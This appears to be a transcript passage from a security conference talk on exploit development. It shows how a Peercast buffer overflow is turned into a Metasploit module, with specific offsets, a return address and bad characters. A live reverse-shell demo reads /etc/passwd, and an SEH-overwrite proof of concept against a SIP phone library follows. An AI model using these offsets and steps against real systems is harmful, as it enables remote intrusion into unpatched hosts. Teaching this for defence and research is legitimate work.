kernel 2.4, compiled with this, compiled with that, you know, running on Apache this or Java that. There'll be some values which will keep on changing from platform to platform for your exploit. Like in case of Peercast binary, you got your EIP to be overwritten as 0808FF97. That's for Peercast 0.1212. If it's like Peercast 0.1214, it'll be like some other number. So there you just create a big list of target tables and put those values in there. And here the constructor is pretty simple. It's almost always going to be this. You just create a new self object and return it to the framework. And lastly, you have your exploit method, which you will pull off these variables from the target array that the user will populate. Pull off stuff like what's my target host, what's the target port, what's the shellcode that is chosen by the user. Later on, what you do is you construct the payload, and then you open up a socket, launch the payload, wait for a handler. This is the basic construction of the exploit module. Now, let me show you the Peercast module. It's pretty much what you have to do is just make a copy of this exploit skeleton, and in the exploit method, you copy and paste code from your proof of concept if you have written it cleanly, and then just assign values and references from the rest of the Metasploit variables. It'll be clearer when I walk you through this. I've created a module called myPeercast. I just give it a name called myPeercast Linux. Put in the stuff here. Notice in the payload area, I've got space of up to 200 characters. This I find out from testing, like how much works and how much doesn't. I've got a bad character list. Like for example, you can't include null bytes, line feeds, carriage returns, spaces, ampersands, semicolons, because this payload is going to travel as a part of the URL, the URI. And we can't have these, otherwise it's going to break the parsing. We prepend it with this stack happiness assembly. And then down here, I've preloaded it with one of the offsets that I've observed. I mean, for Peercast 1214, I know that EIP occurs at 780 bytes down the line. And the shellcode is referenced at 784 bytes down the buffer. And a jump ESP instruction can be found at 0x0808FF97. If you try for another version of Peercast, all you got to do is add one more line to this array. You don't have to recode the exploit, just find the values from GDBing it, and your exploit will be available for yet another version of Peercast. You have your constructor, and at the end, here is where you construct the payload. It's the same code that I copied from the proof of concept. You put a prefix, you put your suffix, you construct the buffer over here, and finally you create your payload saying my payload is prefix and padding. You pack the return address, you have a little knob sled, you have your shellcode, and then the suffix. And then at the very end, all you got to do is say $s send payload, and that's going to be it. So let's now fire up the framework and make this run. Okay, Peercast is running. We have a very slick web interface for Metasploit. I'm not going to use that. I'll use the classic command line thing. Say oops. //msf console, Metasploit console starting up. To use this exploit, you just say use my Peercast Linux. You have to, of course, copy this Perl module into the Metasploit exploit directory, and say show options. So here it is. It requires a remote host and a remote port. So I just say set our host to 192.168.7.177. So I set the remote host. So I have to set the remote port as well, 17,000, because I chose to run it on another port. And now comes the time to pick a payload. So let us say show payloads. Show payloads. We have the following payloads available to us. So let us select, what shall we do? Linux IA32 reverse shell. So I say set payload Linux IA32 reverse shell. What this payload is going to do is it's going to cause the exploited process to return me a TCP connection on my listener and bind a shell to it. I'll need to give it one more option, that is what is my host's IP address. So I say set lhost to 192.168.7.41. That's my IP address. I'm all set. And now the last thing I have to do is exploit it. So I just say exploit. Hopefully, if all goes well, the demo is not going to bomb. Ooh. Started, it says trying this. It says got a connection from remote host to me, and it's just waiting. If I say ls, here we go, ID, here we go, cat, etc password, here we go. Okay, once we're done with this, we exit and hit Control-C. The handler comes back to us. There are some exploits which you can abuse. I mean, some programs which you can exploit over and over again. Like, if this wasn't enough, you just go and do it again and say, ooh, I did it again. And there are some programs which you can do it once. Try not, do or do not. There is no try. And then it'll die. Okay. So this is just a quick overview of how to use the framework to integrate your exploit in. Let me show you some other examples. Let me show you a Windows example with the SIP phone, and time permitting, we'll come back and do the Oracle example because it's a little bit involved. So let me quit this framework here. And let me fire up my Windows box. All right, so here's my Windows desktop. Let me quit out of that other Peercast thing. Okay. Okay, the next demo I want to do is actually an SEH overwrite, structured exception handler overwrite exploit, which causes this SIP library to fail. So let me show you. Here's a SIP phone that I have. In fact, this is the same library that is being used in AOL Instant Messenger's Triton phone. So guess what? After this demo, you can all go back and bomb out all AOL Instant Messengers. This is like dial a shell. Okay, let me attach a debugger to this, WinDBG. So I just want to step through it and see how the vulnerability manifests itself. So I'm going to attach WinDBG and say go for this. Okay. Let me find my mouse. There it is. And show you the first proof of concept. I have a file called sipex1.pl. This is the first proof of concept for the SIP phone. What I'm doing is creating a SIP header with stuff like invite, to, via, from, call, caller ID. The interesting part is the CSEC header. I mean, the SIP header looks pretty much like any HTTP type protocol header. The CSEC header out of this SIP request contains an overflow. The overflow here is CSEC is designed only to take 24 bytes. Anything more than 24 bytes causes it to blow up. The problem is further complicated because the programmers of SIPXTAPI have put in custom exception handling. So if you actually overwrite too much, the exception handler, its own exception handler will kick in and try to save the program. Right. However, what we're going to do in this exploit is we're not going to overwrite EIP. We're not going to overwrite the EIP return value. We're going to go end up overwriting the return value for, the address of the exception handler itself. So it's like, I say, you kick a program in the rear, when it spins around, you say, that guy did it. And then that's where your handler, overwritten handler is, and you get control of EIP once again. So that's an SEH overflow, a 10-second version of how an SEH overwrite is. Okay, so at the top, at the fourth line at the top, you say my CSEC is equal to A multiplied by 30. That's good enough to kick in the exploit. However, a 30-byte shellcode does not do anything for us. We can't pack in anything practical within, not 30 bytes, actually 24 bytes is all we have. The smallest shellcode I know available which works practically is an egg hunt shellcode. I'm sure HD and Vinny might show it in their Metasploit talk. But the egg hunt shellcode still takes 28 bytes, and we can't fit that. So that's no good. But if we go and overwrite the structured exception handler, we get a really, really long buffer, and we can pack in good shellcode in there. Anyway, so let me show you some of the debug traces and analyze this really quickly. I still have 20 minutes, right? Cool. Oh, then I can take like a 2-second breather. Right. So let me launch this sipex1.pl. It's going to ask me for a target host. The beauty of this exploit is it's UDP. It's not TCP. So guess what? Single